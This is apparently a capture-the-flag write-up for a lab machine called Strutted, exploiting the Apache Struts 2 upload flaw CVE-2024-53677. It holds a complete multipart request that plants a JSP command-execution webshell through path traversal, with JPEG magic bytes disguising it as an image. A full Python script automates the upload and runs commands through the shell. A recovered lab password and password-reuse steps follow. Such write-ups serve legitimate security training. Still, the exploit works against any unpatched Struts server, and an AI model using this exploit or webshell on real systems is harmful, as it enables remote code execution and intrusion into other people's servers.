Syk0

Strutted


Overview

Strutted runs an Apache Struts 2 application vulnerable to CVE-2024-53677, a flaw in the Struts file upload logic: tampering with the upload parameters lets the client control the stored filename, including path traversal sequences, so a JSP webshell can be written outside the intended upload directory and into the webroot. A password is then found in the application's files and the james OS user is identified. Privilege escalation notes are minimal beyond the initial shell.


Recon

Nmap

Ports 22 and 80 open.

Web Enumeration

The application homepage offers a sample download.

The upload feature is handled by Apache Struts 2: the form posts to /upload.action, and the .action suffix plus the framework's error and parameter handling confirm it.


Foothold

CVE-2024-53677 - Struts File Upload Path Traversal

Apache Struts 2 has a long history of critical file upload bugs. CVE-2024-53677 is a flaw in the file upload logic: the filename Struts records for an uploaded file can be overridden from the request, here through the top.UploadFileName parameter (the form field is Upload, so the interceptor's filename property is UploadFileName), and traversal sequences in that value are not stripped, so the file is written outside the intended upload directory. Affected versions are Struts 2.0.0 through 2.3.37, 2.5.0 through 2.5.33 and 6.0.0 through 6.3.0.2. The fix in 6.4.0 replaces the old upload interceptor with the Action File Upload mechanism, so an application is only safe once it has been migrated to that mechanism, not merely upgraded.

Reference PoC: https://github.com/Cythonic1/CVE-2024-53677-POC/blob/master/main.go

Craft a multipart upload request that writes a JSP webshell to the webroot:

POST /upload.action HTTP/1.1
Host: strutted.htb
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3RSZ9PS7AmdU5qmw
 
------WebKitFormBoundary3RSZ9PS7AmdU5qmw
Content-Disposition: form-data; name="Upload"; filename="6qC7Ole6.jpg"
Content-Type: image/jpeg
 
ÿØÿà
<%@ page import="java.io.*" %>
<%
    String cmd = request.getParameter("cmd");
    if (cmd != null) {
        Process p = Runtime.getRuntime().exec(cmd);
        BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));
        String line;
        while ((line = in.readLine()) != null) {
            out.println(line);
        }
    }
%>
------WebKitFormBoundary3RSZ9PS7AmdU5qmw
Content-Disposition: form-data; name="top.UploadFileName"
 
../../shell.jsp
------WebKitFormBoundary3RSZ9PS7AmdU5qmw--

Key points:

  • The filename in the file part (6qC7Ole6.jpg) is a decoy; the name actually used on disk is whatever top.UploadFileName supplies
  • ../../shell.jsp walks up two directories from the upload directory into the webroot (adjust the depth if the upload directory sits elsewhere)
  • The file is declared image/jpeg and starts with the JPEG SOI/APP0 bytes FF D8 FF E0 (shown above as ÿØÿà) so that magic-byte and MIME checks pass; the JSP source follows immediately and Tomcat still compiles it because the extension is .jsp

The webshell is now accessible at http://strutted.htb/shell.jsp?cmd=id.
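As an added example (not code from this write-up or from the referenced Go PoC), the Python below builds the same multipart body as the request above, posts it to /upload.action, and then calls the dropped shell to confirm the write landed in the webroot. The host strutted.htb, the Upload field, the top.UploadFileName override and the ../../ depth are taken from the request above; the function names and timeouts are assumptions of this example.

```python
"""Added example for the CVE-2024-53677 upload request shown in the write-up.

Assumed: target strutted.htb on port 80, form field "Upload", override
parameter top.UploadFileName, webroot two levels above the upload directory.
"""
import http.client
import urllib.parse

BOUNDARY = "----WebKitFormBoundary3RSZ9PS7AmdU5qmw"

# JPEG SOI + APP0 marker bytes (FF D8 FF E0); enough to satisfy magic-byte checks.
JPEG_MAGIC = b"\xff\xd8\xff\xe0"

# Same minimal webshell as in the request above.
JSP_SHELL = b"""<%@ page import="java.io.*" %>
<%
    String cmd = request.getParameter("cmd");
    if (cmd != null) {
        Process p = Runtime.getRuntime().exec(cmd);
        BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));
        String line;
        while ((line = in.readLine()) != null) {
            out.println(line);
        }
    }
%>
"""


def build_body(decoy_name: str, target_path: str, payload: bytes = JSP_SHELL,
               boundary: str = BOUNDARY) -> bytes:
    """Return the multipart/form-data body.

    Part 1: the file part, field "Upload", with a harmless-looking .jpg name and
            image/jpeg type, carrying JPEG magic bytes followed by the JSP.
    Part 2: the top.UploadFileName override that sets the real on-disk name,
            traversal sequence included.
    """
    b = boundary.encode()
    parts = [
        b"--" + b + b"\r\n"
        + b'Content-Disposition: form-data; name="Upload"; filename="'
        + decoy_name.encode() + b'"\r\n'
        + b"Content-Type: image/jpeg\r\n\r\n"
        + JPEG_MAGIC + b"\n" + payload + b"\r\n",
        b"--" + b + b"\r\n"
        + b'Content-Disposition: form-data; name="top.UploadFileName"\r\n\r\n'
        + target_path.encode() + b"\r\n",
        b"--" + b + b"--\r\n",
    ]
    return b"".join(parts)


def upload(host: str, body: bytes, boundary: str = BOUNDARY,
           path: str = "/upload.action") -> int:
    """POST the body to the Struts upload action and return the HTTP status."""
    conn = http.client.HTTPConnection(host, 80, timeout=15)
    conn.request("POST", path, body=body, headers={
        "Host": host,
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Content-Length": str(len(body)),
    })
    resp = conn.getresponse()
    resp.read()
    conn.close()
    return resp.status


def run_cmd(host: str, cmd: str, shell_path: str = "/shell.jsp") -> str:
    """Call the dropped webshell; a non-empty reply confirms the write landed."""
    conn = http.client.HTTPConnection(host, 80, timeout=15)
    query = urllib.parse.urlencode({"cmd": cmd})
    conn.request("GET", f"{shell_path}?{query}", headers={"Host": host})
    resp = conn.getresponse()
    out = resp.read().decode(errors="replace")
    conn.close()
    return out


if __name__ == "__main__":
    body = build_body("6qC7Ole6.jpg", "../../shell.jsp")
    print("upload status:", upload("strutted.htb", body))
    print(run_cmd("strutted.htb", "id"))
```

If the upload succeeds but shell.jsp returns 404, the upload directory is at a different depth than assumed; vary the number of ../ segments in target_path rather than the decoy name.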

Credential Discovery

From the webshell, enumerate the application's configuration and deployment files; a password is found there:

IT14d6SSP81k

The james user exists in /etc/passwd.

Test the recovered password against SSH and su as james; password reuse between the application and the OS account is the expected path.


Privilege Escalation

From the james shell (or the webshell), enumerate sudo rights (sudo -l) and SUID binaries to find the escalation path to root.


Attack Chain Summary

Phase                  Technique                        Result
Recon                  Web enumeration                  Struts 2 upload action
Foothold               CVE-2024-53677 path traversal    JSP webshell in webroot
Credential discovery   Application enumeration          IT14d6SSP81k + james user
Privesc                sudo/SUID enumeration            Root access